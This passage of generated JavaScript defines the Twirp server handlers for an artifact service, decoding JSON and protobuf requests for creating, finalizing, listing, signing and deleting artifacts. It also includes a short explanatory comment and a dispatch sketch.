|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.FinalizeArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.FinalizeArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.FinalizeArtifactResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceListArtifactsJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.ListArtifactsRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.ListArtifacts(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.ListArtifacts(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.ListArtifactsResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceGetSignedArtifactURLJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.GetSignedArtifactURLRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.GetSignedArtifactURL(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.GetSignedArtifactURL(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.GetSignedArtifactURLResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceDeleteArtifactJSON(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            const body = JSON.parse(data.toString() || "{}");
            request = artifact_1.DeleteArtifactRequest.fromJson(body, {
                ignoreUnknownFields: true,
            });
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the json request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.DeleteArtifact(ctx, inputReq);
            });
        }
        else {
            response = yield service.DeleteArtifact(ctx, request);
        }
        return JSON.stringify(artifact_1.DeleteArtifactResponse.toJson(response, {
            useProtoFieldName: true,
            emitDefaultValues: false,
        }));
    });
}
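// The protobuf handlers below mirror the JSON handlers above, with binary
// (de)serialization instead: requests are decoded with fromBinary, and
// responses are encoded with toBinary and wrapped in Buffer.from so the
// transport receives a Node.js Buffer rather than a raw Uint8Array.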
function handleArtifactServiceCreateArtifactProtobuf(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            request = artifact_1.CreateArtifactRequest.fromBinary(data);
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the protobuf request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.CreateArtifact(ctx, inputReq);
            });
        }
        else {
            response = yield service.CreateArtifact(ctx, request);
        }
        return Buffer.from(artifact_1.CreateArtifactResponse.toBinary(response));
    });
}
function handleArtifactServiceFinalizeArtifactProtobuf(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            request = artifact_1.FinalizeArtifactRequest.fromBinary(data);
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the protobuf request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.FinalizeArtifact(ctx, inputReq);
            });
        }
        else {
            response = yield service.FinalizeArtifact(ctx, request);
        }
        return Buffer.from(artifact_1.FinalizeArtifactResponse.toBinary(response));
    });
}
function handleArtifactServiceListArtifactsProtobuf(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            request = artifact_1.ListArtifactsRequest.fromBinary(data);
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the protobuf request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.ListArtifacts(ctx, inputReq);
            });
        }
        else {
            response = yield service.ListArtifacts(ctx, request);
        }
        return Buffer.from(artifact_1.ListArtifactsResponse.toBinary(response));
    });
}
function handleArtifactServiceGetSignedArtifactURLProtobuf(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            request = artifact_1.GetSignedArtifactURLRequest.fromBinary(data);
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the protobuf request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.GetSignedArtifactURL(ctx, inputReq);
            });
        }
        else {
            response = yield service.GetSignedArtifactURL(ctx, request);
        }
        return Buffer.from(artifact_1.GetSignedArtifactURLResponse.toBinary(response));
    });
}
function handleArtifactServiceDeleteArtifactProtobuf(ctx, service, data, interceptors) {
    return __awaiter(this, void 0, void 0, function* () {
        let request;
        let response;
        try {
            request = artifact_1.DeleteArtifactRequest.fromBinary(data);
        }
        catch (e) {
            if (e instanceof Error) {
                const msg = "the protobuf request could not be decoded";
                throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
            }
        }
        if (interceptors && interceptors.length > 0) {
            const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
            response = yield interceptor(ctx, request, (ctx, inputReq) => {
                return service.DeleteArtifact(ctx, inputReq);
            });
        }
        else {
            response = yield service.DeleteArtifact(ctx, request);
        }
        return Buffer.from(artifact_1.DeleteArtifactResponse.toBinary(response));
    });
}
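// Illustrative dispatch sketch (not part of the generated file; the function
// name and content-type check are assumptions): a Twirp transport would route
// a request to the JSON or protobuf variant of a handler based on the
// request's Content-Type header, e.g.:
//
//   function dispatchListArtifacts(ctx, service, data, contentType, interceptors) {
//       return contentType === "application/protobuf"
//           ? handleArtifactServiceListArtifactsProtobuf(ctx, service, data, interceptors)
//           : handleArtifactServiceListArtifactsJSON(ctx, service, data, interceptors);
//   }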
//# sourceMappingURL=artifact.twirp.js.map